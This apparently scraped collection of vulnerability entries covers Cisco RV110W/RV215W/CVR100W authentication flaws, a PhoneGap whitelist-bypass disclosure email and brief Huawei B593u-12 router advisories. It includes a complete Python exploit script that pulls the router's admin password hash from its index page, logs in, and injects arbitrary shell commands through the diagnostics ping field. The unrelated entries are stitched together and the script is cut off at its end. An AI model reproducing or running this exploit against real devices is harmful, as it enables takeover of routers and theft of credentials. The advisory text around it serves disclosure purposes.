The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275. Vendors have confirmed this vulnerability Bug ID CSCul94527 , CSCum86264 ,and CSCum86275 It is released as.Administrative access may be obtained by using a function to intercept requests by a third party. Cisco RV Series Routers are router devices developed by Cisco. The vulnerability is due to the failure to properly process the authentication request. The attacker can manipulate the special POST data, bypass the login page of the management interface, and gain administrator access and obtain the management password. An attacker can exploit this issue to perform man-in-the-middle attacks and disclose sensitive information. Successful exploits may lead to other attacks. This issue is being tracked by Cisco bug IDs CSCul94527, CSCum86264, and CSCum86275. A remote attacker could exploit this vulnerability to gain administrative-level privileges. The following versions are affected: Cisco RV110W routers with firmware 1.2.0.9 and earlier, RV215W routers with firmware 1.1.0.5 and earlier, and CVR100W routers with firmware 1.0.1.19 and earlier. #!/usr/bin/env python2 ##### ## Cisco RV110W Password Disclosure and OS Command Execute. ### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.) # Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute # Date: 2018-08 # Exploit Author: RySh # Vendor Homepage: https://www.cisco.com/ # Version: 1.1.0.9 # Tested on: RV110W 1.1.0.9 # CVE : CVE-2014-0683, CVE-2015-6396 import os import sys import re import urllib import urllib2 import getopt import json import ssl ssl._create_default_https_context = ssl._create_unverified_context ### # Usage: ./{script_name} 192.168.1.1 443 "reboot" ### if __name__ == "__main__": IP = argv[1] PORT = argv[2] CMD = argv[3] # Get session key, Just access index page. url = 'https://' + IP + ':' + PORT + '/' req = urllib2.Request(url) result = urllib2.urlopen(req) res = result.read() # parse 'admin_pwd'! -- Get credits admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1] admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:] print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd # Get session_id by POST req2 = urllib2.Request(url + "login.cgi") req2.add_header('Origin', url) req2.add_header('Upgrade-Insecure-Requests', 1) req2.add_header('Content-Type', 'application/x-www-form-urlencoded') req2.add_header('User-Agent', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') req2.add_header('Referer', url) req2.add_header('Accept-Encoding', 'gzip, deflate') req2.add_header('Accept-Language', 'en-US,en;q=0.9') req2.add_header('Cookie', 'SessionID=') data = {"submit_button": "login", "submit_type": "", "gui_action": "", "wait_time": "0", "change_action": "", "enc": "1", "user": admin_user, "pwd": admin_pwd, "sel_lang": "EN" } r = urllib2.urlopen(req2, urllib.urlencode(data)) resp = r.read() login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1] session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1] # Execute your commands via diagnose command parameter, default command is `reboot` req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id) req3.add_header('Origin', url) req3.add_header('Upgrade-Insecure-Requests', 1) req3.add_header('Content-Type', 'application/x-www-form-urlencoded') req3.add_header('User-Agent', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') req3.add_header('Referer', url) req3.add_header('Accept-Encoding', 'gzip, deflate') req3.add_header('Accept-Language', 'en-US,en;q=0.9') req3.add_header('Cookie', 'SessionID=') data_cmd = {"submit_button": "Diagnostics", "change_action": "gozila_cgi", "submit_type": "start_ping", "gui_action": "", "traceroute_ip": "", "commit": "1", "ping_times": "3 |" + CMD + "|", "ping_size": "64", "wait_time": "4", "ping_ip": "127.0.0.1", "lookup_name": "" } r = urllib2.urlopen(req3, urllib.urlencode(data_cmd)) . The following email was sent to Apache Cordova/PhoneGap on 12/13/2013, and again on 1/17/2014. As there has been no response, we are re-posting it here to alert the general public of the inherent vulnerabilities in Apache Cordova/PhoneGap. ############################################################################################## Dear PhoneGap contributors, PhoneGap\x92s domain whitelisting for accessing native resources is broken and can be bypassed. These vulnerabilities can be exploited by any third-party domain loaded inside an iframe (e.g., malicious ad scripts). Below, we give a brief summary of the vulnerabilities. You can find more details in the paper <http://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf>. 1. Domain whitelisting on Android (before API 11) and Windows Phone 7 and 8 relies on the URL interception call that does not intercept iframe and XMLHttpRequest URLs. Consequently, it does not restrict which domains can be loaded in iframes. Any script inside an iframe can directly use PhoneGap\x92s internal JavaScript interfaces to the Java objects and access native resources: for example, by calling execute = cordova.require('cordova/exec'); var opts = cordova.require ('cordova/plugin/ ContactFindOptions' ); and directly operating on these objects. 2. A malicious script running in an iframe can dynamically choose any of PhoneGap\x92s vulnerable bridge mechanisms at runtime (e.g. addJavascriptInterface or loadUrl on Android) and use it to bypass the domain whitelist. We call this the chosen-bridge attack. 3. PhoneGap\x92s whitelisting check on Android is incorrect - it misses an anchor at the end of the regular expression: this.whiteList.add(Pattern.compile("\x88https?://(.*\\.)?" + origin)); For example, if foo.com is whitelisted, foo.com.evil.com will pass the check. 4. PhoneGap\x92s domain whitelisting on Android (API 11 or highler) and iOS does not adhere to the same-origin policy. Third-party scripts included using <script> tags are blocked unless their source domain is whitelisted, even though these scripts execute in the origin of the hosting page, not their source origin. 5. Instead of just blocking access to bridges from non-whitelisted domains, PhoneGap completely blocks these domains from being loaded in the browser. This prevents ad-supported apps from displaying third-party ads and destroys the look-and-feel of many Web pages. We have a proof-of-concept implementation (a 400-line patch for PhoneGap 2.9.0 on Android) called NoFrak [https://github.com/georgiev-martin/NoFrak] which fixes these vulnerabilities. NoFrak does not allow Web content from non-whitelisted domains to access native resources but still displays it correctly in the browser. If you are interested in discussing how to merge NoFrak or some parts of NoFrak to PhoneGap\x92s main branch, please let us know. Thanks, Martin, Suman, and Vitaly ##############################################################################################

Huawei B593u-12 / T-Mobile HOME NET Router is an LTE wireless router series. The Huawei B593u-12 / T-Mobile HOME NET Router diagnostic page \"ping\" feature has an input validation vulnerability that allows an attacker to exploit the vulnerability to run arbitrary commands.

Huawei B593u-12 / T-Mobile HOME NET Router is an LTE wireless router series. Huawei B593u-12 / T-Mobile HOME NET Router has an information disclosure vulnerability. Allows an attacker to log in to the routing interface using a passwordless \"guest\" session to access configuration device information.

Huawei B593u-12 / T-Mobile HOME NET Router is an LTE wireless router series. Huawei B593u-12 / T-Mobile HOME NET Router has multiple cross-site request forgery vulnerabilities, which allows remote attackers to exploit malicious vulnerabilities to construct malicious URIs, entice users to resolve, and perform malicious operations in the target user context.

Huawei B593u-12 / T-Mobile HOME NET Router is an LTE wireless router series. Huawei B593u-12 / T-Mobile HOME NET Router has a Guest account vulnerability that allows administrators to perform administrator actions through CGI scripts and to change router settings.